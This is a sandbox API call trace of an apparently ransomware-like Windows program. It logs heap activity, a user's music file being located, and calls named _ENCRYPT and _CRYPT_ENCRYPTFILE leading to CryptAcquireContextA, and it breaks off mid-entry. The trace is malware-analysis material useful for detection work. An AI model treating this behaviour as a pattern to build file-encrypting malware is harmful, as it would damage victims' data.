RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.203] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0038.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cc58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0038.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.203] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0038.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0038.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.203] CloseHandle (hObject=0x140) returned 1 [0038.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.204] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.204] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.204] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.204] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0038.204] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.205] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0038.205] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0038.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.205] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.205] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.205] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.205] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b23f10, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0xc7bb7600, ftLastAccessTime.dwHighDateTime=0x1d5b93e, ftLastWriteTime.dwLowDateTime=0xc7bb7600, ftLastWriteTime.dwHighDateTime=0x1d5b93e, nFileSizeHigh=0x0, nFileSizeLow=0x1ccc, dwReserved0=0x0, dwReserved1=0x777648, cFileName="lWN8-ZQxM7632S6p.m4a", cAlternateFileName="LWN8-Z~1.M4A")) returned 0x7c20c0 [0038.205] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.205] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.205] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b23f10, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0xc7bb7600, ftLastAccessTime.dwHighDateTime=0x1d5b93e, ftLastWriteTime.dwLowDateTime=0xc7bb7600, ftLastWriteTime.dwHighDateTime=0x1d5b93e, nFileSizeHigh=0x0, nFileSizeLow=0x1ccc, dwReserved0=0x0, dwReserved1=0x777648, cFileName="lWN8-ZQxM7632S6p.m4a", cAlternateFileName="LWN8-Z~1.M4A")) returned 0x7c20c0 [0038.205] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.207] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.207] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lWN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WN8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZQxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QxM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xM7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="632S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="32S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2S6p.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.208] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.208] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0038.208] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.208] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.209] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.209] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.209] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.209] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.209] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.209] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.209] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.209] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.209] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b23f10, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0xc7bb7600, ftLastAccessTime.dwHighDateTime=0x1d5b93e, ftLastWriteTime.dwLowDateTime=0xc7bb7600, ftLastWriteTime.dwHighDateTime=0x1d5b93e, nFileSizeHigh=0x0, nFileSizeLow=0x1ccc, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="lWN8-ZQxM7632S6p.m4a", cAlternateFileName="LWN8-Z~1.M4A")) returned 0x7c2100 [0038.209] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.209] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.209] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.209] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.209] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.209] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.209] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.209] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0038.209] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.209] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.210] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0038.210] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.210] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.210] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.210] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.210] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.210] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0038.210] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.210] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0038.211] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.211] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.211] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0038.211] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.211] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.211] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.211] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.212] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.212] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.212] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.212] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 